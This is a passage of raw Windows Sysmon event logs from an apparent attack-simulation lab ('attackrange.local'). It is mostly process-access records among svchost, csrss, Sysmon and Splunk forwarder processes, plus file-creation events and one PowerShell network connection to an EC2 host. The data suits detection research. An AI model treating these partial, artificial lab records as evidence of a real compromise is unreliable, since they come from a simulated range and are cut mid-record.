indows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-866E-5FCF-6801-000000009101}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.250{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866E-5FCF-6801-000000009101}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:06.251{10ACEC4A-866E-5FCF-6801-000000009101}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-866F-5FCF-6901-000000009101}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-866F-5FCF-6901-000000009101}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.484{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-866F-5FCF-6901-000000009101}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:58:07.485{10ACEC4A-866F-5FCF-6901-000000009101}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104501Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:23.630{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B764CD6B15A6781597BCCEAD3C032AE,SHA256=700AF41B10760BF9D531E2F90188B9DC4518DC08CD43512AA91F7EF244DDBA2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149315Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:23.425{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A850762F14C99EF28B769A7EEF3B173A,SHA256=41F9FA8E82D0B455A136C5DA8F74214F40455CABE92899306A2E92120D11C0EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149314Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:23.362{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\aborted-session-pingMD5=76B3BD34928B81FBB8EBAB905956A1B0,SHA256=B20AA500A92874DF2BDC4621187621DD0178B044B91729FBD8F9CA6703BAD0B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149313Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:21.213{39BD8DE3-26DA-60CA-F703-00000000D101}5228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58322-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 354300x8000000000000000149312Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:21.212{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 